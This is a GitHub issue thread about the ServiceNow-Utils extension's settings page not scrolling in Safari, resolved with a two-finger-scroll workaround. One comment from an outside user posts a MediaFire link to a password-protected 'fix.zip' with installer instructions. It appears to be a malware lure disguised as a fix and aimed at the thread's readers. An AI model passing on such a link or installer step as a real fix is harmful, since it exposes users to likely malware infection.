### ISSUE TITLE
Settings does not scroll in Safari

### ISSUE THREAD

**Issue by vedang444** [arnoudkooi/ServiceNow-Utils#534]
Sorry I missed replying to the issue when I reported it back in #525 .
To answer your question, the arrow keys and mouse scroll does not allow me to go beyond what is visible either.
When I double click the small grey area at the bottom of the popup it does let me scroll within the slashcommand's "code", but only within the width of what is still visible.
![image](https://github.com/user-attachments/assets/4ff5da9e-a07a-4ec2-a164-a0a683382d3c)

Hi Arnoud,

I just switched over to a Mac and while copying my SNUtils slashcommands and switchesP to the Safari browser, I noticed that I cannot scroll down in the SNUtils settings page like I can on Chrome (no scroll bar either). Could you please look into it or let me know in case I'm doing it wrong.

<img width="806" alt="image" src="https://github.com/user-attachments/assets/dd5deeac-9f90-4d7d-b78e-03968f648425">

BR,
Vedang Vaidya

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by arnoudkooi** [comment]
It seems adding CSS does not have effect, however with either 2 finger scroll or mouse scroll wheel it works, doesn't it.

**Comment by arnoudkooi** [comment]
I dont see how to solve, please respond to this, not open a new issue one if needed

**Comment by vedang444** [comment]
Ah, I didn't know that it works with 2 finger scroll, was always using the mouse. I guess that should be sufficient for now even if mouse scroll does not work.

Thanks for checking it.
